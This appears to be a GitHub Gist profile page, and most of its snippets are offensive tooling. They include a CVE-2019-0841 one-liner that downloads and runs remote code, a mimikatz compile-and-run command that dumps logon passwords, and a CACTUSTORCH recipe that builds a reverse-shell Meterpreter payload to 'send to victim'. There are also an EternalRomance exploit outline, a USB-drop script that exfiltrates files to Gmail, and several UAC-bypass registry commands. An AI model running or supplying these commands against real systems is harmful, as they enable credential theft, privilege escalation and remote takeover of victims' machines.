Skip to content

Instantly share code, notes, and snippets.


illwill xillwillx

View GitHub Profile
xillwillx / admin.ps1
Created Apr 18, 2019
list local admin accounts
View admin.ps1
$admins = Gwmi win32_groupuser –computer;$admins = $admins |? {$_.groupcomponent –like '*"Administrators"'}; $admins |% {$_.partcomponent –match .+Domain\=(.+)\,Name\=(.+)$ > $nul;$matches[1].trim('"') + \ + $matches[2].trim('"') | Select-Object @{Name='Account Name';Expression={$_}}}
xillwillx / CVE-2019-0841.ps1
Last active Jun 17, 2020
CVE-2019-0841 - Overwrite HOST file with "Full Control" permissions given to the user
View CVE-2019-0841.ps1
iex (New-Object net.webclient).downloadstring('');start microsoft-edge:;get-process -name MicrosoftEdge | Stop-process;sleep 2;Native-HardLink -Link "$env:localappdata\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings\settings.dat" -target "$env:windir\system32\drivers\etc\hosts";start microsoft-edge:;get-process -name Microsoftedge | stop-process
View gist:97a9fa7e10fc0d5bcca8f717bf76e904
ssh root@
nano /boot/config.txt
ctrl+w to find
Type: i2c_arm and add the uncommented lines underneath
## i2c_arm
## Enable the ARM's i2c interface
## Default off.
xillwillx / .bash_profile
Last active Dec 28, 2018
Mac ~/.bash_profile
View .bash_profile
export PATH="$PATH:/usr/bin/"
alias ll='ls -GFHAf -1' # ll: directory listing in 1 column
alias f='open -a Finder ./' # f: Opens current directory in MacOS Finder
alias cpwd='pwd|tr -d "\n"|pbcopy' # cpwd: copy the working directory path
alias ..="cd ../"
alias ...="cd ../../"
alias ....="cd ../../../"
alias wttr='curl'
alias myip='curl -s' ;echo
xillwillx / katz.cmd
Last active Oct 21, 2020
mimikatz.cs one-liner
View katz.cmd
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*
git clone && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\
xillwillx / gist:6db5cd392acafc1ac486f9852f698be6
Last active Sep 19, 2018
EternalRomance Python Example with ReverseTCP Meterpreter
View gist:6db5cd392acafc1ac486f9852f698be6
# Test victim IP first to see if exploitable
use auxiliary/scanner/smb/pipe_auditor
#*choose pipe name 'netlogon'
######Exploiting the Victim##########
# Setup Meterpreter Handler
xillwillx / FishSticks.ps1
Created Apr 29, 2017 — forked from SadProcessor/FishSticks.ps1
Generate nefarious powershell wrapped in .wsf for USB-Drop Attacks. Will harvest all files with specified extensions from specified folders and send them to specified Gmail account.
View FishSticks.ps1
____ _ _ ___ _ _ _
| __(_)__| |_ / __| |_(_)__| |__ ___
| _|| (_-< ' \\__ \ _| / _| / /(_-<
|_| |_/__/_||_|___/\__|_\__|_\_\/__/.v1
"Life is like a box of FishSticks, you never know what you're gonna get..."
Benjamin Buford "Bubba" Blue - 1965.
xillwillx / .cmd
Last active Sep 18, 2021
UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting
View .cmd
**UAC bypass for Win10:**
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
**UAC bypass for Win10:**
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f
**UAC bypass for 7/8/10:**
reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f

Keybase proof

I hereby claim:

  • I am xillwillx on github.
  • I am illwill ( on keybase.
  • I have a public key whose fingerprint is 6D14 E83A 93C6 3380 4F0F FF70 E170 DBAA AE04 6737

To claim this, I am signing this object: